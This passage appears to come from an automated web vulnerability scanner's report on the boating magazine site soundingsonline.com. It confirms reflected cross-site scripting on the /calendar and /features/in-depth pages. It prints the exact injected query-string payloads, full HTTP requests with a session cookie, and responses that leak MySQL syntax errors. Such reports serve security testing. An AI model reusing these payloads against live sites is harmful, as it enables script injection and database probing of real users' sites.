document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_news c_daily_news m_top_stories"><!--
Type of page: category<br />Section: 1, s_news<br />Category: 34, c_daily_news<br />Menu: 84, m_top_stories-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Sub..
- /calendar

/calendar CONFIRMED

http://www.soundingsonline.com/calendar?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00209B..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00209B)</script>

Request

GET /calendar?'"--></style></script><script>netsparker(0x00209B)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:31:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:31:57 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x00209B)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x00209B)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/calendar" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="title" content="Calendar of Training, Boat Shows, Antique Boat Shows, Fishing Tournaments and More" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Calendar of Training, Boat Shows, Antique Boat Shows, Fishing Tournaments and More</title> <link href="/calendar/eventlist?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/calendar/eventlist?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="/components/com_eventlist/assets/css/eventlist.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript"> window.addEvent('domready', function(){ var JTooltips = new Tips($$('.hasTip'), { maxTitleChars: 50, fixed: false}); }); </script> <!--[if IE]><style type="text/css">.floattext{zoom:1;}, * html #eventlist dd { height: 1%; }</style><![endif]-->

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_uncategorized c_uncategorized m_calendar"><!--
Type of page: eventlist<br />Section: , s_uncategorized<br />Category: , c_uncategorized<br />Menu: 83, m_calendar-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=star..
- /features/in-depth

/features/in-depth CONFIRMED

http://www.soundingsonline.com/features/in-depth?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x002091)</script>

Request

GET /features/in-depth?'"--></style></script><script>netsparker(0x002091)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:31:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:31:57 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x002091)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x002091)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/features/in-depth" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Featured Stories on Boating and Boater Safety</title> <link href="/features/in-depth?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/features/in-depth?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_features c_in_depth m_in_depth"><!--
Type of page: category<br />Section: 5, s_features<br />Category: 44, c_in_depth<br />Menu: 92, m_in_depth-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
